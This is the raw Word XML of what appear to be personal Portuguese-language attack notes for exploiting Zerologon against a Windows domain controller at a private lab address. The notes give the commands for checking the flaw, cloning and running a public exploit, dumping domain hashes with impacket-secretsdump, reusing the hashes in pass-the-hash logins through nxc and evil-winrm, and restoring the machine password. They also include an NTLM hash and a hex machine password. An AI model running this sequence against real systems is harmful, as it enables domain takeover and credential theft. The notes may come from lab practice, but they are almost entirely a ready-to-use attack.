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F6AB" w14:textId="7BAD26A5" w:rsidR="00865A94" w:rsidRDefault="00865A94">
      <w:r>
        <w:t>###Validar vulnerabilidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C479886" w14:textId="2F52F7E6" w:rsidR="000E5013" w:rsidRDefault="00C2643D">
      <w:r w:rsidRPr="00C2643D">
        <w:t>nxc smb 192.168.220.135 -M zerologon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BEBABC" w14:textId="0A685832" w:rsidR="00865A94" w:rsidRDefault="00865A94" w:rsidP="00C2643D">
      <w:r>
        <w:t>###Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D923EC" w14:textId="657E2783" w:rsidR="00C2643D" w:rsidRDefault="00C2643D" w:rsidP="00C2643D">
      <w:r w:rsidRPr="00C2643D">
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="001928AF">
          <w:rPr>
            <w:rStyle w:val="Hiperligao"/>
          </w:rPr>
          <w:t>https://github.com/Sq00ky/Zero-Logon-Exploit.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72758FC6" w14:textId="33D2B61B" w:rsidR="00C2643D" w:rsidRDefault="00C2643D" w:rsidP="00C2643D">
      <w:r w:rsidRPr="00C2643D">
        <w:t>./zeroLogon-NullPass.py DCTEST 192.168.220.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6045F860" w14:textId="77777777" w:rsidR="00E510D6" w:rsidRDefault="00E510D6" w:rsidP="00E510D6">
      <w:r>
        <w:t>###Dump de hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77566A24" w14:textId="44C0A4C2" w:rsidR="00E510D6" w:rsidRDefault="00E510D6" w:rsidP="00E510D6">
      <w:r w:rsidRPr="00865A94">
        <w:t>impacket-secretsdump -just-dc</w:t>
      </w:r>
      <w:r w:rsidR="00AC4CA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00865A94">
        <w:t>-no-pass DCTEST</w:t>
      </w:r>
      <w:r>
        <w:t>/netbios\</w:t>
      </w:r>
      <w:r w:rsidRPr="00865A94">
        <w:t>$@192.168.220.13</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE6E2D9" w14:textId="54D0F2B8" w:rsidR="00865A94" w:rsidRDefault="00865A94" w:rsidP="00C2643D">
      <w:r>
        <w:t>###</w:t>
      </w:r>
      <w:r w:rsidR="00E510D6">
        <w:t>Validando Credencial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2FA7CF" w14:textId="198C8649" w:rsidR="00C2643D" w:rsidRDefault="00C2643D" w:rsidP="00C2643D">
      <w:r w:rsidRPr="00C2643D">
        <w:t>nxc smb 192.168.220.135 -u 'DCTEST$' -p ''</w:t>
      </w:r>
      <w:r w:rsidR="00E510D6">
        <w:br/>
        <w:t>ou</w:t>
      </w:r>
      <w:r w:rsidR="00E510D6">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E510D6" w:rsidRPr="00E510D6">
        <w:t xml:space="preserve">nxc smb </w:t>
      </w:r>
      <w:r w:rsidR="00E510D6">
        <w:t>192.168.220.135</w:t>
      </w:r>
      <w:r w:rsidR="00E510D6" w:rsidRPr="00E510D6">
        <w:t xml:space="preserve"> -u '</w:t>
      </w:r>
      <w:r w:rsidR="00E510D6">
        <w:t>Administrator</w:t>
      </w:r>
      <w:r w:rsidR="00E510D6" w:rsidRPr="00E510D6">
        <w:t>' -H '</w:t>
      </w:r>
      <w:r w:rsidR="00E510D6">
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="00E510D6" w:rsidRPr="00E510D6">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B770072" w14:textId="0AD87717" w:rsidR="001E50A7" w:rsidRDefault="00E510D6" w:rsidP="00C2643D">
      <w:r>
        <w:t>### Validando acesso via terminal</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E510D6">
        <w:t xml:space="preserve">nxc winrm </w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E510D6">
        <w:t xml:space="preserve"> -u '</w:t>
      </w:r>
      <w:r>
        <w:t>USER</w:t>
      </w:r>
      <w:r w:rsidRPr="00E510D6">
        <w:t>' -H '</w:t>
      </w:r>
      <w:r>
        <w:t>HASH</w:t>
      </w:r>
      <w:r w:rsidRPr="00E510D6">
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ou</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185BC777" w14:textId="77777777" w:rsidR="00E510D6" w:rsidRDefault="00E510D6" w:rsidP="00C2643D"/>
    <w:p w14:paraId="5D6755C1" w14:textId="49924E02" w:rsidR="001E50A7" w:rsidRDefault="00E510D6" w:rsidP="00C2643D">
      <w:r>
        <w:t>### Movimento Lateral (Pass the Hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C085816" w14:textId="35E27AFD" w:rsidR="00E510D6" w:rsidRDefault="00E510D6" w:rsidP="00C2643D">
      <w:r w:rsidRPr="00E510D6">
        <w:t xml:space="preserve">evil-winrm -i </w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E510D6">
        <w:t xml:space="preserve"> -u '</w:t>
      </w:r>
      <w:r>
        <w:t>USER</w:t>
      </w:r>
      <w:r w:rsidRPr="00E510D6">
        <w:t>' -H '</w:t>
      </w:r>
      <w:r>
        <w:t>HASH</w:t>
      </w:r>
      <w:r w:rsidRPr="00E510D6">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1110FFE9" w14:textId="40C3500E" w:rsidR="00E510D6" w:rsidRDefault="00E510D6" w:rsidP="00C2643D">
      <w:r>
        <w:t>ou</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619B1F49" w14:textId="77777777" w:rsidR="00E510D6" w:rsidRDefault="00E510D6" w:rsidP="00C2643D"/>
    <w:p w14:paraId="3BC2FF2B" w14:textId="44407DAB" w:rsidR="001E50A7" w:rsidRDefault="001E50A7" w:rsidP="00C2643D">
      <w:r>
        <w:t>Restore</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001E50A7">
        <w:t>impacket-secretsdump DOMAIN/Administrator@192.168.220.135 -hashes aad3b435b51404eeaad3b435b51404ee:7e9670f23027f89b62a006b3bf28f746</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DFDDD" w14:textId="77777777" w:rsidR="001E50A7" w:rsidRDefault="001E50A7" w:rsidP="00C2643D"/>
    <w:p w14:paraId="4B1D310B" w14:textId="3F573B60" w:rsidR="001E50A7" w:rsidRPr="001E50A7" w:rsidRDefault="00AB3230" w:rsidP="001E50A7">
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:r w:rsidR="001E50A7" w:rsidRPr="001E50A7">
        <w:t>restorepassword.py DOM/DCTEST$ -target-ip 192.168.220.135 -hexpass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E50A7" w:rsidRPr="001E50A7">
        <w:t>89a9b8e23de7e47cf031b56bf78b408e29ef318dfef2b83c343d119ddc550a41df58188e03558f5f2c49826a67613a2c4a4e33a125a095046f6206f94d4368d02ba3bad83155eece996b185c67a702dc7d197424a3d5f1ff2feb45409ad4b70f1c6d71b1252083e16801c7ada4ed5f10a8d3aa035e83e7907e98e72f5e5cca725547f6d5537fbef0bc3a3fd90ed4fc1b3fc62a9a1bfdf1021f2b937a2bb9b3e8749f2b3c9f68188ebebf122cfec679a824776249d771a3592e086161624789205774bc069ca1c4d0b5bfe88200bd283f90dd8bec80f3f4be08fbb8355ef54cb3cd452c3aef42736e52dd1222d0d69c7d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED49A2" w14:textId="77777777" w:rsidR="001E50A7" w:rsidRDefault="001E50A7" w:rsidP="00C2643D"/>
    <w:sectPr w:rsidR="001E50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3D"/>
    <w:rsid w:val="00087F39"/>
    <w:rsid w:val="000E5013"/>
    <w:rsid w:val="001E0906"/>
    <w:rsid w:val="001E50A7"/>
    <w:rsid w:val="00851339"/>
    <w:rsid w:val="00865A94"/>
    <w:rsid w:val="00AB3230"/>
    <w:rsid w:val="00AC4CA1"/>
    <w:rsid w:val="00BA7748"/>
    <w:rsid w:val="00C2643D"/>
    <w:rsid w:val="00CC395A"/>
    <w:rsid w:val="00D44B73"/>
    <w:rsid w:val="00E5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D3CB1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0F86359F-DD0F-412D-9A6D-DC418CA4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2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2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2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2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2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2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2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2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2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2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2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2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26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2643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26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2643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26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26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2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2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2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2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2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264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43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264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2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2643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2643D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2643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26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q00ky/Zero-Logon-Exploit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202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2026-03-20T13:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-05T22:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>